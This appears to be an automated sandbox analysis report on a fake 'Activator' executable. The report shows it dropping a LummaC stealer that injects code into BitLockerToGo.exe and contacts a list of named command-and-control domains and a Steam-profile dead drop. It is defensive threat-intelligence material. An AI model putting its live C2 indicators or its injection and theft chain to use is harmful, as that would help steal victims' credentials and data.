    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dui70.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsound.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsreg.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dosvc.dllJump to dropped file
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6844Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F0ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E5F0ECE0
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5EF647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E5EF647C
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F23130 FindFirstFileExA,0_2_00007FF7E5F23130
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F15134 VirtualQuery,GetSystemInfo,0_2_00007FF7E5F15134
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311503934.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: dosvc.dllBinary or memory string: CDeviceProfile::_IsOnVirtualMachine
    Source: n3.exe, 00000002.00000002.2283941481.0000000001CAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
    Source: dosvc.dllBinary or memory string: CCopyFromCache::_OnPieceFromDiskPiece %u read from cache, hr: %x, #pending: %IuCSwarmDownload::_SendRequestsdesiredRate: %u, preferredBlockSize: %Iu, nRequests: %Iu, waiting to send? %d for 0x%p, %llu bytes requested, next request in %u msCBackgroundCopyJob::SetPropertySetting cost flags to %xUnsupported job property ID was set: %d. it will be ignoredCSwarmConnPeerSockListener::OnHavegot have (%u) from %lsCSwarmConn::OnHaveSwarm: %ls, peer is upload: %lsCSwarm::StartSwarm: %ls, start download (hr = %x)CGlobalConfigManager::GetDownloadRateLimitCycleParamsDownloadRateLimiting: totalCycleMsecs = %u, unlimitedTimeMsecs = %uDownloadRateUnlimitedMsecsDownloadRateCycleMsecsCDownloadRateStrategy::ResetStateDownloadRateStrategy: Reset state to noneEthernetUnknownIncompleteMissingPieceMaxDistEndgamePiecesThresholdPctIncompletePiecePriorityThresholdIncompletePiecePriorityChgFactorCHttpPeerConn::_OnCdnErrorSwarm: %ls, HTTP failure headers: %lsSwarm: %ls, HTTP request %hs failed: %x, status code: %u, requestOffset: %llu, requestSize: %llu, responseSize: %llu, IP: %ls, url: %lsCTelemetryLogger::TraceErrorCdnCommhr: %x, httpCode: %u, errorCount: %u, fileId: %ls, sessionId: %ls, url: %ls, isHeadRequest: %d, requestOffset: %llu, requestSize: %llu, responseSize: %llu, serverIp: %ls, headers: %lsToo early to send %hs event. hr: %x, timeSinceLastEvent: %llu, errorsSinceLastEvent: %uFailureCdnCommunicationCGlobalConfigManager::IsDownloadEnabledDownloadEnabled? hr: %x, download mode: %uParticipationRatePublicParticipationRateCGlobalConfigManager::_IsDownloadEnabledPerDiskTotalSizeminDiskSize = %u GB, totalDiskSize = %u GBMinTotalPhysMemGBCGlobalConfigManager::GetRequiredMinTotalRAMMin total physical memory = %u GBMinTotalDiskSizeGBUploadLimitStateUploadLimitMonthIDCContentConfigManager::GetContentExpirationSecsUsed cache expiration from CP: %uCGlobalConfigManager::GetMaxCacheAgeSecsCache expiration value (override? %d) = %uMaxCacheAgeSecsCDeliveryOptimizationManager::_DoScanForOrphanFilesScanning for any orphaned file under %lsCBackgroundCopyJob::ResumeFromSavedStateJob %ls, was saved in state %dCHttpPeerConn::WakeUpSwarm: %ls, starting HTTP requests: %lsCSwarmConn::SendInterestedSwarm: %ls, sending interested to peer: %lsBackgroundQosBpsCGlobalConfigManager::GetDownloadMinQosMin Qos value (override? %d) = %uCContentConfigManager::GetDownloadMinQosUsed Qos value from CP: = %uCSwarmConn::StartSendBlockSwarm: %ls, sending block %hs to peer: %lsCSwarmConnPeerSockListener::OnInterestedgot interested from %lsCWinHttpAgent::_OnErrorUnhandled http request error, request = 0x%p, hr = %xMaxJobAgeSecsCGlobalConfigManager::GetMaxJobAgeSecsJob max age = %u secondsContentDownloadModeCContentConfigManager::RefreshDiscoveryConfigsCCM discovering for %ls0-1CAnnounceSequencer::StopSwarm: %ls, announce sequencer stop, running? %d, final? %dCTelemetryLogger::TraceUploadUpload event type = %u, reason = %x, sessionId = %ls, fileId = %ls, cached = %llu, LAN = %llu, Group = %llu, Internet =
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004474B0 LdrInitializeThunk,3_2_004474B0
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F1AC68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7E5F1AC68
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F241B0 GetProcessHeap,0_2_00007FF7E5F241B0
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F16B24 SetUnhandledExceptionFilter,0_2_00007FF7E5F16B24
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F1AC68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7E5F1AC68
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F15CE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7E5F15CE0
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F16940 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7E5F16940

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Allocates memory in foreign processes
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
    Injects a PE file into a foreign processes
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
    LummaC encrypted strings found
    Source: n3.exe, 00000002.00000002.2284662032.00000000025AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: covvercilverow.shop
    Source: n3.exe, 00000002.00000002.2284662032.00000000025AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: surroundeocw.shop
    Source: n3.exe, 00000002.00000002.2284662032.00000000025AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: abortinoiwiam.shop
    Source: n3.exe, 00000002.00000002.2284662032.00000000025AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: pumpkinkwquo.shop
    Source: n3.exe, 00000002.00000002.2284662032.00000000025AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: priooozekw.shop
    Source: n3.exe, 00000002.00000002.2284662032.00000000025AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: deallyharvenw.shop
    Source: n3.exe, 00000002.00000002.2284662032.00000000025AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: defenddsouneuw.shop
    Source: n3.exe, 00000002.00000002.2284662032.00000000025AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: racedsuitreow.shop
    Source: n3.exe, 00000002.00000002.2284662032.00000000025AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: branchtriviawlek.shop
    Writes to foreign memory regions
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2665008Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44D000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 450000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 460000Jump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F0ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E5F0ECE0
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe" Jump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.com/1KhnJ4Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
    Source: dxgi.dllBinary or memory string: Shell_TrayWnd
    Source: dxgi.dllBinary or memory string: D3D9_IdHot_Ctrl_SnapDesktopAppOnHMDEnumAdapters failed.App window cloakedLock screen activeShell_TrayWndShell_SecondaryTrayWndSnapped DesktopOccluder wnd ('Code' is HWND):%sD3DKMTGetThunkVersion
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F28DF0 cpuid 0_2_00007FF7E5F28DF0
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF7E5F0DE44
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F1400C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,SleepEx,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E5F1400C
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5EF6768 GetVersionExW,0_2_00007FF7E5EF6768
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		1
    Exploitation for Privilege Escalation    		1
    Virtualization/Sandbox Evasion    		1
    Input Capture    		1
    System Time Discovery    		Remote Services1
    Input Capture    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell    		Boot or Logon Initialization Scripts312
    Process Injection    		312
    Process Injection    		LSASS Memory121
    Security Software Discovery    		Remote Desktop Protocol1
    Archive Collected Data    		3
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading    		11
    Deobfuscate/Decode Files or Information    		Security Account Manager1
    Virtualization/Sandbox Evasion    		SMB/Windows Admin Shares2
    Clipboard Data    		4
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
    Obfuscated Files or Information    		NTDS1
    Process Discovery    		Distributed Component Object ModelInput Capture15
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Software Packing    		LSA Secrets2
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Timestomp    		Cached Domain Credentials36
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525047 Sample: Activator by URKE v2.5.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 40 surroundeocw.shop 2->40 42 racedsuitreow.shop 2->42 44 9 other IPs or domains 2->44 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 5 other signatures 2->56 8 Activator by URKE v2.5.exe 1 44 2->8         started        signatures3 process4 file5 22 C:\Users\user\AppData\Local\Temp\...\n3.exe, PE32 8->22 dropped 24 C:\Users\user\AppData\Local\Temp\...\dxil.dll, PE32+ 8->24 dropped 26 C:\Users\user\AppData\Local\Temp\...\dxgi.dll, PE32+ 8->26 dropped 28 14 other files (none is malicious) 8->28 dropped 11 n3.exe 8->11         started        14 chrome.exe 1 8->14         started        process6 dnsIp7 58 Multi AV Scanner detection for dropped file 11->58 60 Writes to foreign memory regions 11->60 62 Allocates memory in foreign processes 11->62 64 2 other signatures 11->64 17 BitLockerToGo.exe 11->17         started        46 192.168.2.6, 443, 49188, 49446 unknown unknown 14->46 48 239.255.255.250 unknown Reserved 14->48 20 chrome.exe 14->20         started        signatures8 process9 dnsIp10 30 advocachark.store 104.21.42.210, 443, 49707 CLOUDFLARENETUS United States 17->30 32 steamcommunity.com 104.102.49.254, 443, 49705 AKAMAI-ASUS United States 17->32 34 www.google.com 142.250.186.164, 443, 49728, 49761 GOOGLEUS United States 20->34 36 a.nel.cloudflare.com 35.190.80.1, 443, 49716, 49718 GOOGLEUS United States 20->36 38 4 other IPs or domains 20->38

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Activator by URKE v2.5.exe47%ReversingLabs

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\DWrite.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\DragExt64.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dosvc.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dpx.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\drvstore.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsac.resources.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsadmin.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsound.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsreg.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsuiext.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dui70.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\duser.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dwmcore.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxcompiler.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxgi.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxil.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe62%ReversingLabsWin32.Spyware.Lummastealer

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    a.nel.cloudflare.com
    		35.190.80.1
    		truefalse
      		unknown
      steamcommunity.com
      		104.102.49.254
      		truefalse
        		unknown
        challenges.cloudflare.com
        		104.18.94.41
        		truefalse
          		unknown
          www.google.com
          		142.250.186.164
          		truefalse
            		unknown
            advocachark.store
            		104.21.42.210
            		truetrue
              		unknown
              iplogger.com
              		172.67.188.178
              		truefalse
                		unknown
                priooozekw.shop
                		unknown
                		unknowntrue
                  		unknown
                  surroundeocw.shop
                  		unknown
                  		unknowntrue
                    		unknown
                    racedsuitreow.shop
                    		unknown
                    		unknowntrue
                      		unknown
                      covvercilverow.shop
                      		unknown
                      		unknowntrue
                        		unknown
                        pumpkinkwquo.shop
                        		unknown
                        		unknowntrue
                          		unknown
                          abortinoiwiam.shop
                          		unknown
                          		unknowntrue
                            		unknown
                            deallyharvenw.shop
                            		unknown
                            		unknowntrue
                              		unknown
                              branchtriviawlek.shop
                              		unknown
                              		unknowntrue
                                		unknown
                                defenddsouneuw.shop
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1300389161:1727962023:QSoqQkjz0PpYr1szVnKI7X7Fbyyo_-jod5ykE5mZtpI/8ccd8289bc184228/6e64b4d206e3507false
                                    		unknown
                                    https://advocachark.store/apitrue
                                      		unknown
                                      abortinoiwiam.shoptrue
                                        		unknown
                                        defenddsouneuw.shoptrue
                                          		unknown
                                          priooozekw.shoptrue
                                            		unknown
                                            surroundeocw.shoptrue
                                              		unknown
                                              https://steamcommunity.com/profiles/76561199724331900true
                                              • URL Reputation: malware
                                              		unknown
                                              https://a.nel.cloudflare.com/report/v4?s=s6r14g6s0T1RrWk2y8Ac0rqnC%2FLVLKf2EBqQ3omkQ6J8Fu5v2uteSLetEpRzPZwZOe3Cty8FaC55S6Ug9Ti7cB8WbEk0McIbvpsM98kwIN1pc5t2ryHR8THhTApRoqQ%3Dfalse
                                                		unknown
                                                https://iplogger.com/1KhnJ4false
                                                  		unknown
                                                  racedsuitreow.shoptrue
                                                    		unknown
                                                    https://iplogger.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1787772256:1727962003:iWCRLIu4ZygN5hNL9RXktFOgCDxm7GLFIz5ri-9QP5c/8ccd8274b9e442c9/79895931bf779a4false
                                                      		unknown
                                                      https://a.nel.cloudflare.com/report/v4?s=pxV1pun6Odl5bdgZBWOVUjaqoZSnytH0ktSOuDwxstcebwZJv7QxCFrA975IpNydkNjpmdlUL%2BeEqF5Mvm8Ff7RkSMM9uw40RxJXZZeeBq6mD8njDcipAzlQbMKcRqU%3Dfalse
                                                        		unknown
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccd8289bc184228/1727964569367/0T9ApzVXXVphPFjfalse
                                                          		unknown
                                                          https://iplogger.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8ccd8274b9e442c9false
                                                            		unknown
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8ccd8289bc184228/1727964569365/186f8d6e14d4fe0eb3804fd1be46d1535ddfe35c7ad2d6cb8e9dce82775fb104/hz5T_VEh25F25lZfalse
                                                              		unknown
                                                              covvercilverow.shoptrue
                                                                		unknown
                                                                pumpkinkwquo.shoptrue
                                                                  		unknown
                                                                  deallyharvenw.shoptrue
                                                                    		unknown
                                                                    https://a.nel.cloudflare.com/report/v4?s=8QZ0N5GYE%2FQjzGUJlP62kh8Njave9zbqER%2BeJnNlnXQEFViktq7fh2msQPW%2BH7EOrMbGiERjfuF5tX%2Fjmt91iBNAC1V76eA1aIGOMD%2Fz9L%2BGU3Kj4C%2BIDjDLNXyDzbQ%3Dfalse
                                                                      		unknown

                                                                      URLs from Memory and Binaries

                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://cdn.discordapp.com/icons/n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://steamcommunity.com/?subsection=broadcastsBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
